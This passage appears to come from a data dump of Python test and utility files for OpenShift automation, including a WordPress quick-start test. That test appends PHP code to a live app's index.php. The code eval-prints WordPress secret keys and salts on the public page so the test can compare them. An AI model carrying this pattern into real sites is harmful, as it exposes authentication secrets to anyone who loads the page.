OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NamespacedEnvVars)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5900841355323792, "alphanum_fraction": 0.6020362973213196, "avg_line_length": 31.724637985229492, "blob_id": "fb833db265410e1c5939bddf53eaec67163ba056", "content_id": "5c4b6a0c1d474dec56be4fae0da750486f4b42bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2259, "license_type": "no_license", "max_line_length": 93, "num_lines": 69, "path": "/automation/open/testmodules/RT/cartridge/local_lib_mirrors_perl.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 9, 2011\n\n[US1309][rhc-cartridge]Create local lib mirrors for Perl framework\nhttps://tcms.engineering.redhat.com/case/122395/\n\"\"\"\nimport os,sys,re\n\nimport 
testcase, common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1309][rhc-cartridge]Create local lib mirrors for Perl framework\"\n self.app = { 'name':'perltest', 'type':'perl-5.10' }\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app['name']))\n\nclass LocalLibMirrorsPerl(OpenShiftTest):\n def test_method(self):\n self.steps_list.append( testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app['type'],self.app['name']),\n common.create_app,\n function_parameters = [self.app['name'], self.app['type']],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Edit deplist.txt\",\n \"echo 'YAML' >> %s/deplist.txt\" % self.app['name'],\n expect_description = \"deplist.txt should be updated successfully\",\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\"git push\",\n \"cd %s && git commit -am test && git push\" % self.app['name'],\n expect_string_list = ['Successfully installed YAML-', 'Fetching http.*perl'],\n expect_return = 0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LocalLibMirrorsPerl)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6103633642196655, "alphanum_fraction": 0.6352624297142029, "avg_line_length": 22.203125, "blob_id": "b691b7414737d056611d06d8f3b07fc892eb5e95", "content_id": "45d172fbe10dd07d7e4e5d9aa39438aab1669b08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 135, "num_lines": 64, "path": "/automation/open/testmodules/UI/web/case_122257.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122257.py\n# Date: 2012/07/24 14:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass RegisterWithInvalidEmail(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_home()\n\n\t#go to the register page\n web.go_to_register()\n\n\t#register with invalid email\n web.input_by_id(\"web_user_email_address\",'''123''')\n web.input_by_id(\"web_user_password\",\"redhat\")\n web.input_by_id(\"web_user_password_confirmation\",\"redhat\")\n\n #click to sign up\n web.click_element_by_xpath('''//input[@id='web_user_submit']''') \n time.sleep(2)\n web.assert_text_equal_by_xpath('''Please enter a valid email address.''','''//div[@id='web_user_email_address_input']/div/p''')\n\t\t\n\n self.tearDown()\n\n return self.passed(\"Case 122257--register with invalid email test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef 
get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RegisterWithInvalidEmail)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122257.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6269373893737793, "alphanum_fraction": 0.6378642320632935, "avg_line_length": 26.39702796936035, "blob_id": "74e26b0826db8e01d34549590a3f48a3ca5cc664", "content_id": "2b1f7c5932a3fcfd0c2007771de4ba03b99d67cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12904, "license_type": "no_license", "max_line_length": 92, "num_lines": 471, "path": "/automation/open/lib/supports/nmsbuiltins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# vim:ts=4:sw=4\n# License: LGPL\n\n\"\"\"\nThis module contains extra functions and constants that are inserted into\nPython's global (__builtin__) namespace. Only truly useful and general\nfunctions should go here. Also, things that fix Python's \"warts\" can go here.\nThis module, when imported, effectively extends the set of Python builtins.\n\n\n\"\"\"\nimport sys\n\n# works like None, but is callable\nclass NULLType(type):\n\tdef __new__(cls, name, bases, dct):\n\t\treturn type.__new__(cls, name, bases, dct)\n\tdef __init__(cls, name, bases, dct):\n\t\tsuper(NULLType, cls).__init__(name, bases, dct)\n\tdef __str__(cls):\n\t\treturn \"NULL\"\n\tdef __repr__(cls):\n\t\treturn \"\"\n\tdef __nonzero__(cls):\n\t\treturn False\n\tdef __call__(*args):\n\t\treturn None\nNULL = NULLType(\"NULL\", (type,), {})\n\n# shortcuts to save time\nsow = sys.stdout.write\nsew = sys.stderr.write\n# the embedded vim interpreter replaces stdio with objects that don't have a\n# flush method!\ntry: \n\tsoflush = sys.stdout.flush\nexcept AttributeError:\n\tsoflush = NULL\ntry:\n\tseflush = sys.stderr.flush\nexcept AttributeError:\n\tseflush = NULL\n\nclass Enum(int):\n\t__slots__ = (\"_name\")\n\tdef __new__(cls, val, name=None): # name must be optional for unpickling to work\n\t\tv = int.__new__(cls, val)\n\t\tv._name = str(name)\n\t\treturn v\n\tdef __getstate__(self):\n\t\treturn int(self), self._name\n\tdef __setstate__(self, args):\n\t\ti, self._name = args\n\tdef __str__(self):\n\t\treturn self._name\n\tdef __repr__(self):\n\t\treturn \"%s(%d, %r)\" % (self.__class__.__name__, self, self._name)\n\nclass Enums(list):\n\tdef __init__(self, *init):\n\t\tfor i, val in enumerate(init):\n\t\t\tif issubclass(type(val), list):\n\t\t\t\tfor j, subval in enumerate(val):\n\t\t\t\t\tself.append(Enum(i+j, str(subval)))\n\t\t\telif isinstance(val, Enum):\n\t\t\t\tself.append(val)\n\t\t\telse:\n\t\t\t\tself.append(Enum(i, str(val)))\n\tdef __repr__(self):\n\t\treturn \"%s(%s)\" % (self.__class__.__name__, list.__repr__(self))\n\n# return a mapping from integer to the Enum.\ndef enummap(*enums):\n return dict(map(lambda enum: (int(enum), enum), enums))\n\n# return a mapping from Enum name to the enum.\ndef enummapstr(*enums):\n return dict(map(lambda enum: (str(enum), enum), enums))\n\n# emulate an unsigned 32 bit and 64 bit ints with a long\nclass unsigned(long):\n\tfloor = 0L\n\tceiling = 4294967295L\n\tbits = 32\n\t_mask = 0xFFFFFFFFL\n\tdef __new__(cls, val):\n\t\treturn long.__new__(cls, val)\n\tdef __init__(self, val):\n\t\tif val < self.floor or val > self.ceiling:\n\t\t\traise OverflowError, \"value %s out of range for type %s\" % (val, self.__class__.__name__)\n\tdef __repr__(self):\n\t\treturn \"%s(%sL)\" % 
(self.__class__.__name__, self)\n\tdef __add__(self, other):\n\t\treturn self.__class__(long.__add__(self, other))\n\tdef __sub__(self, other):\n\t\treturn self.__class__(long.__sub__(self, other))\n\tdef __mul__(self, other):\n\t\treturn self.__class__(long.__mul__(self, other))\n\tdef __floordiv__(self, other):\n\t\treturn self.__class__(long.__floordiv__(self, other))\n\tdef __mod__(self, other):\n\t\treturn self.__class__(long.__mod__(self, other))\n\tdef __divmod__(self, other):\n\t\treturn self.__class__(long.__divmod__(self, other))\n\tdef __pow__(self, other, modulo=None):\n\t\treturn self.__class__(long.__pow__(self, other, modulo))\n\tdef __lshift__(self, other):\n\t\treturn self.__class__(long.__lshift__(self, other) & self._mask)\n\tdef __rshift__(self, other):\n\t\treturn self.__class__(long.__rshift__(self, other))\n\tdef __and__(self, other):\n\t\treturn self.__class__(long.__and__(self, other))\n\tdef __xor__(self, other):\n\t\treturn self.__class__(long.__xor__(self, other))\n\tdef __or__(self, other):\n\t\treturn self.__class__(long.__or__(self, other))\n\tdef __div__(self, other):\n\t\treturn self.__class__(long.__div__(self, other))\n\tdef __truediv__(self, other):\n\t\treturn self.__class__(long.__truediv__(self, other))\n\tdef __neg__(self):\n\t\treturn self.__class__(long.__neg__(self))\n\tdef __pos__(self):\n\t\treturn self.__class__(long.__pos__(self))\n\tdef __abs__(self):\n\t\treturn self.__class__(long.__abs__(self))\n\tdef __invert__(self):\n\t\treturn self.__class__(long.__invert__(self))\n\tdef __radd__(self, other):\n\t\treturn self.__class__(long.__radd__(self, other))\n\tdef __rand__(self, other):\n\t\treturn self.__class__(long.__rand__(self, other))\n\tdef __rdiv__(self, other):\n\t\treturn self.__class__(long.__rdiv__(self, other))\n\tdef __rdivmod__(self, other):\n\t\treturn self.__class__(long.__rdivmod__(self, other))\n\tdef __rfloordiv__(self, other):\n\t\treturn self.__class__(long.__rfloordiv__(self, other))\n\tdef __rlshift__(self, other):\n\t\treturn self.__class__(long.__rlshift__(self, other))\n\tdef __rmod__(self, other):\n\t\treturn self.__class__(long.__rmod__(self, other))\n\tdef __rmul__(self, other):\n\t\treturn self.__class__(long.__rmul__(self, other))\n\tdef __ror__(self, other):\n\t\treturn self.__class__(long.__ror__(self, other))\n\tdef __rpow__(self, other):\n\t\treturn self.__class__(long.__rpow__(self, other))\n\tdef __rrshift__(self, other):\n\t\treturn self.__class__(long.__rrshift__(self, other))\n\tdef __rshift__(self, other):\n\t\treturn self.__class__(long.__rshift__(self, other))\n\tdef __rsub__(self, other):\n\t\treturn self.__class__(long.__rsub__(self, other))\n\tdef __rtruediv__(self, other):\n\t\treturn self.__class__(long.__rtruediv__(self, other))\n\tdef __rxor__(self, other):\n\t\treturn self.__class__(long.__rxor__(self, other))\n\n\nclass unsigned64(unsigned):\n\tfloor = 0L\n\tceiling = 18446744073709551615L\n\tbits = 64\n\t_mask = 0xFFFFFFFFFFFFFFFFL\n\n# a list that self-maintains a sorted order\nclass sortedlist(list):\n def insort(self, x):\n hi = len(self)\n lo = 0\n while lo < hi:\n mid = (lo+hi)//2\n if x < self[mid]:\n hi = mid\n else:\n lo = mid+1\n self.insert(lo, x)\n append = insort\n\n# print helpers\ndef _printobj(obj):\n\tsow(str(obj))\n\tsow(\" \")\n\ndef _printerr(obj):\n\tsew(str(obj))\n\tsew(\" \")\n\ndef Write(*args):\n\tmap (_printobj, args)\n\tsoflush()\n\ndef Print(*args):\n\t\"\"\"Print is a replacement for the built-in print statement. Except that it\n\tis a function object. 
\"\"\"\n\tmap (_printobj, args)\n\tsow(\"\\n\")\n\tsoflush()\n\ndef Printerr(*args):\n\t\"\"\"Printerr writes to stderr.\"\"\"\n\tmap(_printerr, args)\n\tsew(\"\\n\")\n\tseflush()\n\ndef IF(test, tv, fv=None):\n\t\"\"\"Functional 'if' test. \"\"\"\n\tif test:\n\t\treturn tv\n\telse:\n\t\treturn fv\n\ndef sgn(val):\n\t\"\"\"Sign function. Returns -1 if val negative, 0 if zero, and 1 if positive.\"\"\"\n\ttry:\n\t\treturn val.__sgn__()\n\texcept AttributeError:\n\t\ttv = type(val)\n\t\tif val == 0:\n\t\t\treturn tv(0)\n\t\tif val > 0:\n\t\t\treturn tv(1)\n\t\telse:\n\t\t\treturn tv(-1)\n\ndef add2builtin(name, obj):\n\tsetattr(sys.modules['__builtin__'], name, obj)\n\ndef add_exception(excclass, name=None):\n\tsetattr(sys.modules['__builtin__'], name or excclass.__name__, excclass)\n\nclass Queue(list):\n\tdef push(self, obj):\n\t\tself.insert(0, obj)\n\nclass Stack(list):\n\tdef push(self, obj):\n\t\tself.append(obj)\n\n# a self-substituting string object. Just set attribute names to mapping names\n# that are given in the initializer string.\nclass mapstr(str):\n\tdef __new__(cls, initstr, **kwargs):\n\t\ts = str.__new__(cls, initstr)\n\t\treturn s\n\tdef __init__(self, initstr, **kwargs):\n\t\td = {}\n\t\tfor name in _findkeys(self):\n\t\t\td[name] = kwargs.get(name, None)\n\t\tself.__dict__[\"_attribs\"] = d\n\tdef __setattr__(self, name, val):\n\t\tif name not in self.__dict__[\"_attribs\"].keys():\n\t\t\traise AttributeError, \"invalid attribute name %r\" % (name,)\n\t\tself.__dict__[\"_attribs\"][name] = val\n\tdef __getattr__(self, name):\n\t\ttry:\n\t\t\treturn self.__dict__[\"_attribs\"][name]\n\t\texcept KeyError:\n\t\t\traise AttributeError, \"Invalid attribute %r\" % (name,)\n\tdef __str__(self):\n\t\tif None in self._attribs.values():\n\t\t\traise ValueError, \"one of the attributes %r is not set\" % (self._attribs.keys(),)\n\t\treturn self % self._attribs\n\tdef __call__(self, **kwargs):\n\t\tfor name, value in kwargs.items():\n\t\t\tsetattr(self, name, value)\n\t\treturn self % self._attribs\n\tdef __repr__(self):\n\t\treturn \"%s(%s)\" % (self.__class__.__name__, str.__repr__(self))\n\tdef attributes(self):\n\t\treturn self._attribs.keys()\n\nimport re\n_findkeys = re.compile(r\"%\\((\\w+)\\)\").findall\ndel re\n\n# make the friggin errno values global\nimport errno\nfor e in dir(errno):\n\tif e.startswith(\"E\"):\n\t\tadd2builtin(e, getattr(errno, e))\ndel e\n\n# metaclasses... returns a new class with given bases and class attributes\ndef newclass(name, *bases, **attribs):\n\tclass _NewType(type):\n\t\tdef __new__(cls):\n\t\t\treturn type.__new__(cls, name, bases, attribs)\n\treturn _NewType()\n\n# curry function returns callable with some parameters already setup to run. 
\ndef curry(meth, *args, **kwargs):\n\tdef _lambda(*iargs, **ikwargs):\n\t\tiargs = args + iargs\n\t\tkwds = kwargs.copy()\n\t\tkwds.update(ikwargs)\n\t\treturn meth(*iargs, **kwds)\n\treturn _lambda\n\ndef debugmethod(meth):\n\tdef _lambda(*iargs, **ikwargs):\n\t\ttry:\n\t\t\treturn meth(*iargs, **ikwargs)\n\t\texcept:\n\t\t\tex, val, tb = sys.exc_info()\n\t\t\timport debugger\n\t\t\tdebugger.post_mortem(ex, val, tb)\n\treturn _lambda\n\n# property to make system call methods safe from EINTR\ndef systemcall(meth):\n\tdef systemcallmeth(*args, **kwargs):\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\trv = meth(*args, **kwargs)\n\t\t\texcept EnvironmentError, why:\n\t\t\t\tif why.args and why.args[0] == errno.EINTR:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\traise\n\t\t\telse:\n\t\t\t\tbreak\n\t\treturn rv\n\treturn systemcallmeth\n\n\ndef removedups(s):\n\t\"\"\"Return a list of the elements in s, but without duplicates.\nThanks to Tim Peters for fast method.\n\t\"\"\"\n\tn = len(s)\n\tif n == 0:\n\t\treturn []\n\tu = {}\n\ttry:\n\t\tfor x in s:\n\t\t\tu[x] = 1\n\texcept TypeError:\n\t\tdel u # move on to the next method\n\telse:\n\t\treturn u.keys()\n\t# We can't hash all the elements. Second fastest is to sort,\n\t# which brings the equal elements together; then duplicates are\n\t# easy to weed out in a single pass.\n\ttry:\n\t\tt = list(s)\n\t\tt.sort()\n\texcept TypeError:\n\t\tdel t # move on to the next method\n\telse:\n\t\tassert n > 0\n\t\tlast = t[0]\n\t\tlasti = i = 1\n\t\twhile i < n:\n\t\t\tif t[i] != last:\n\t\t\t\tt[lasti] = last = t[i]\n\t\t\t\tlasti = lasti + 1\n\t\t\ti = i + 1\n\t\treturn t[:lasti]\n\t# Brute force is all that's left.\n\tu = []\n\tfor x in s:\n\t\tif x not in u:\n\t\t\tu.append(x)\n\treturn u\n\n\ndef pprint_list(clist, indent=0, width=74):\n\t\"\"\"pprint_list(thelist, [indent, [width]])\nPrints the elements of a list to the screen fitting the most elements\nper line. Should not break an element across lines. 
Sort of like word\nwrap for lists.\"\"\"\n\tindent = min(max(indent,0),width-1)\n\tif indent:\n\t\tprint \" \" * indent,\n\tprint \"[\",\n\tcol = indent + 2\n\tfor c in clist[:-1]:\n\t\tps = \"%r,\" % (c)\n\t\tcol = col + len(ps) + 1\n\t\tif col > width:\n\t\t\tprint\n\t\t\tcol = indent + len(ps) + 1\n\t\t\tif indent:\n\t\t\t\tprint \" \" * indent,\n\t\tprint ps,\n\tif col + len(clist[-1]) > width:\n\t\tprint\n\t\tif indent:\n\t\t\tprint \" \" * indent,\n\tprint \"%r ]\" % (clist[-1],)\n\ndef reorder(datalist, indexlist):\n\t\"\"\"reorder(datalist, indexlist)\n\tReturns a new list that is ordered according to the indexes in the\n\tindexlist.\t\n\te.g.\n\treorder([\"a\", \"b\", \"c\"], [2, 0, 1]) -> [\"c\", \"a\", \"b\"]\n\t\"\"\"\n\treturn [datalist[idx] for idx in indexlist]\n\ndef enumerate(collection):\n\t'Generates an indexed series: (0,coll[0]), (1,coll[1]) ...'\n\ti = 0\n\tit = iter(collection)\n\twhile 1:\n\t\tyield (i, it.next())\n\t\ti += 1\n\ndef str2hex(s):\n\tres = [\"'\"]\n\tfor c in s:\n\t\tres.append(\"\\\\x%02x\" % ord(c))\n\tres.append(\"'\")\n\treturn \"\".join(res)\n\nadd2builtin(\"add2builtin\", add2builtin)\nadd2builtin(\"add_exception\", add_exception)\nadd2builtin(\"newclass\", newclass)\nadd2builtin(\"curry\", curry)\nadd2builtin(\"debugmethod\", debugmethod)\nadd2builtin(\"systemcall\", systemcall)\nadd2builtin(\"NULL\", NULL)\nadd2builtin(\"Enum\", Enum)\nadd2builtin(\"Enums\", Enums)\nadd2builtin(\"enummap\", enummap)\nadd2builtin(\"enummapstr\", enummapstr)\nadd2builtin(\"sortedlist\", sortedlist)\nadd2builtin(\"Write\", Write)\nadd2builtin(\"Print\", Print)\nadd2builtin(\"WriteLn\", Print) # alias for Print\nadd2builtin(\"Printerr\", Printerr)\nadd2builtin(\"IF\", IF)\nadd2builtin(\"sgn\", sgn)\nadd2builtin(\"Queue\", Queue)\nadd2builtin(\"Stack\", Stack)\nadd2builtin(\"mapstr\", mapstr)\nadd2builtin(\"removedups\", removedups)\nadd2builtin(\"pprint_list\", pprint_list)\nadd2builtin(\"reorder\", reorder)\nadd2builtin(\"str2hex\", str2hex)\n# common enumerations\nadd2builtin(\"NO\", Enum(0, \"NO\"))\nadd2builtin(\"YES\", Enum(1, \"YES\"))\nadd2builtin(\"DEFAULT\", Enum(2, \"DEFAULT\"))\nadd2builtin(\"UNKNOWN\", Enum(3, \"UNKNOWN\"))\n\nif not hasattr(sys.modules['__builtin__'], \"True\"):\n\tadd2builtin(\"True\", Enum(1, \"True\"))\n\tadd2builtin(\"False\", Enum(0, \"False\"))\nif not hasattr(sys.modules['__builtin__'], \"enumerate\"):\n\tadd2builtin(\"enumerate\", enumerate)\nadd2builtin(\"unsigned\", unsigned)\nadd2builtin(\"unsigned64\", unsigned64)\n\nif __name__ == \"__main__\":\n TEST = mapstr(\"some%(one)s one\\nsome%(two)s three\\nsome%(three)s four\")\n print TEST.attributes()\n try:\n print TEST\n except ValueError:\n print \"got correct error from %r\" % TEST\n TEST.one = \"one\"\n TEST.two = \"thing\"\n TEST.three = \"where\"\n print TEST\n s = str(TEST) # makes new, substituted, string\n assert s == \"someone one\\nsomething three\\nsomewhere four\"\n print TEST.three\n" }, { "alpha_fraction": 0.5660169124603271, "alphanum_fraction": 0.574598491191864, "avg_line_length": 41.046390533447266, "blob_id": "0b2cfa042cdc522dbf2918a87a689e985af09fe3", "content_id": "1f9c4dbb8ca0be5e965722170acb8413c6781481", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8157, "license_type": "no_license", "max_line_length": 221, "num_lines": 194, "path": "/automation/open/testmodules/RT/quick_start/quick_start_wordpress.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env 
python\nimport os, sys, re, time\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\n# Global variables\nCODE = \"\"\"\n$_secure_tokens = array(\n 'AUTH_KEY',\n 'SECURE_AUTH_KEY',\n 'LOGGED_IN_KEY',\n 'NONCE_KEY',\n 'AUTH_SALT',\n 'SECURE_AUTH_SALT',\n 'LOGGED_IN_SALT',\n 'NONCE_SALT'\n);\n\nprint \"<table>\";\nforeach ($_secure_tokens as $key) {\n printf (\"<tr><td>%s</td><td>%s</td></tr>\",$key,eval(\"return $key;\"));\n}\nprint \"</table>\";\n\"\"\"\n\nDEFAULT_AUTH = { \"AUTH_KEY\" : 'w*lE&r=t-;!|rhdx5}vlF+b=+D>a)R:nTY1Kdrw[~1,xDQS]L&PA%uyZ2:w6#ec',\n \"SECURE_AUTH_KEY\" : '}Sd%ePgS5R[KwDxdBt56(DM:0m1^4)-k6_p8}|C:[-ei:&qA)j!X`:7d-krLZM*5',\n \"LOGGED_IN_KEY\" : '$l^J?o)!zhp6s[-x^ckF}|BjU4d+(g1as)n/Q^s+k|,ZZc@E^h%Rx@VTm|0|?]6R',\n \"NONCE_KEY\" : '#f^JM8d^!sVsq]~|4flCZHdaTy.-I.f+1tc[!h?%-+]U}|_8qc K=k;]mXePl-4v',\n \"AUTH_SALT\" : 'I_wL2t!|mSw_z_ zyIY:q6{IHw:R1yTPAO^%!5,*bF5^VX`5aO4]D=mtu~6]d}K?',\n \"SECURE_AUTH_SALT\" : '&%j?6!d<3IR%L[@iz=^OH!oHRXs4W|D,VCD7w%TC.uUa`NpOH_XXpGtL$A]{+pv9',\n \"LOGGED_IN_SALT\" : 'N<mft[~OZp0&Sn#t(IK2px0{KloRcjvIJ1+]:,Ye]>tb*_aM8P&2-bU~_Z>L/n(k',\n \"NONCE_SALT\" : 'u E-DQw%[k7l8SX=fsAVT@|_U/~_CUZesq{v(=y2}#X&lTRL{uOVzw6b!]`frTQ|',\n}\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = ['DEV', 'STG', 'INT']\n\n def initialize(self):\n self.steps_list = []\n self.summary = \"[Runtime][rhc-cartridge]quick-start example: Wordpress\"\n self.app_name = \"wordpress\"\n self.new_app_name = \"wordpress2\"\n self.app_type = common.app_types[\"php\"]\n self.git_repo = self.app_name\n self.git_upstream_url = \"git://github.com/openshift/wordpress-example.git\"\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass QuickStartWordpress(OpenShiftTest):\n\n def get_auth(self, app_name):\n app_url = OSConf.get_app_url(app_name)\n for i in range(4):\n (ret, output) = common.command_getstatusoutput(\"curl -H 'Pragma: no-cache' '%s'\" % (app_url), True)\n if ret == 0:\n break\n time.sleep(5)\n lst = re.findall(r\"(?<=<td>).*?(?=</td>)\", output, re.S)\n tokens = dict()\n for i in range(0, len(lst), 2):\n tokens[lst[i]] = lst[i+1]\n return tokens\n\n def modify_app(self, app_name):\n global CODE\n time.sleep(10)\n cmds = [\n \"cd %s\" % (app_name),\n \"git remote add upstream -m master %s\" % (self.git_upstream_url),\n \"git pull -s recursive -X theirs upstream master\",\n ]\n (ret, output) = common.command_getstatusoutput(\" && \".join(cmds))\n if ret != 0:\n return ret\n try:\n f = file(\"%s/php/index.php\" % (app_name), \"a\")\n f.write(CODE)\n f.close()\n except IOError:\n self.info(\"Failed to edit %s/php/index.php\" % (app_name))\n cmds = [\n \"cd %s\" % (app_name),\n \"git add .\",\n \"git commit -amt\",\n \"git push\",\n ]\n (ret, output) = common.command_getstatusoutput(\" && \".join(cmds))\n return ret\n\n def verify1(self, app_name):\n global DEFAULT_AUTH\n self.tokens = self.get_auth(app_name)\n (ret, output) = common.command_getstatusoutput(\"rhc app restart -a %s -l %s -p '%s' -d %s\" % (app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS), True)\n self.tokens_restart = self.get_auth(app_name)\n for key in self.tokens.keys():\n if self.tokens[key] == DEFAULT_AUTH[key]:\n return self.failed(\"%s failed: The auth info is the same as default - %s\" % (self.__class__.__name__, key))\n for key in self.tokens.keys():\n if 
self.tokens[key] != self.tokens_restart[key]:\n                return self.failed(\"%s failed: The auth info becomes different after restarting - %s\" % (self.__class__.__name__, key))\n        return 0\n\n    def verify2(self, app_name):\n        self.tokens2 = self.get_auth(app_name)\n        for key in self.tokens.keys():\n            if self.tokens[key] == self.tokens2[key]:\n                return self.failed(\"%s failed: The auth info is the same as the previous app - %s\" % (self.__class__.__name__, key))\n        return 0\n\n    def test_method(self):\n        global DEFAULT_AUTH\n\n        # 1. Create app\n        self.steps_list.append(testcase.TestCaseStep(\"Create an %s app: %s\" % (self.app_type, self.app_name),\n            common.create_app,\n            function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n            expect_description=\"the app should be created successfully\",\n            expect_return=0))\n        # 2. Embed mysql to the app\n        self.steps_list.append(testcase.TestCaseStep(\"Embed mysql-5.1 to it\",\n            common.embed,\n            function_parameters=[self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n            expect_description=\"mysql should be embedded successfully\",\n            expect_return=0))\n        # 3. Modify the app git repo\n        self.steps_list.append(testcase.TestCaseStep(\"Modify the app git repo\",\n            self.modify_app,\n            function_parameters=[self.app_name,],\n            expect_description=\"git push should succeed\",\n            expect_return=0))\n        # 4. Verify the auth info is different from the default one and restart won't change the auth info\n        self.steps_list.append(testcase.TestCaseStep(\"Verify the auth info is different from the default one and survives a restart\",\n            self.verify1,\n            function_parameters=[self.app_name,],\n            expect_description=\"the auth info should differ from the default and stay unchanged after restart\",\n            expect_return=0))\n        # 5. Create a new wordpress app\n        self.steps_list.append(testcase.TestCaseStep(\"Create another %s app: %s\" % (self.app_type, self.new_app_name),\n            common.create_app,\n            function_parameters=[self.new_app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n            expect_description=\"the app should be created successfully\",\n            expect_return=0))\n        # 6. Embed mysql to the app\n        self.steps_list.append(testcase.TestCaseStep(\"Embed mysql-5.1 to the new app\",\n            common.embed,\n            function_parameters=[self.new_app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n            expect_description=\"mysql should be embedded successfully\",\n            expect_return=0))\n        # 7. Modify the new app git repo\n        self.steps_list.append(testcase.TestCaseStep(\"Modify the new app git repo\",\n            self.modify_app,\n            function_parameters=[self.new_app_name,],\n            expect_description=\"git push should succeed\",\n            expect_return=0))\n        # 8. 
Verify the auth info is different from the previous app\n self.steps_list.append(testcase.TestCaseStep(\"Verify the auth info is different from the previous app\",\n self.verify2,\n function_parameters=[self.new_app_name,],\n expect_description=\"git push should succeed\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartWordpress)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6959620118141174, "alphanum_fraction": 0.7045130729675293, "avg_line_length": 23.172412872314453, "blob_id": "9b0e9fc74815e4b75d431b222d5b30ab6afd4103", "content_id": "82140aff4c48ca2f263a8c24f27d387bd1c2af6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2105, "license_type": "no_license", "max_line_length": 79, "num_lines": 87, "path": "/automation/open/lib/supports/XML/xfce4.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# \n#\n# Copyright (C) 1999-2004 Keith Dart <[email protected]>\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
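# get_auth() above pulls every <td> cell with a lookbehind/lookahead regex and
# then pairs alternating cells into a name -> value dict. The same parse in
# isolation, assuming the flat two-column table markup the test page emits
# (no nested tags inside cells):
import re

def parse_token_table(html):
    cells = re.findall(r"(?<=<td>)(.*?)(?=</td>)", html, re.S)
    # cells alternate: name, value, name, value, ...
    return dict(zip(cells[0::2], cells[1::2]))

sample = "<table><tr><td>AUTH_KEY</td><td>abc</td></tr></table>"
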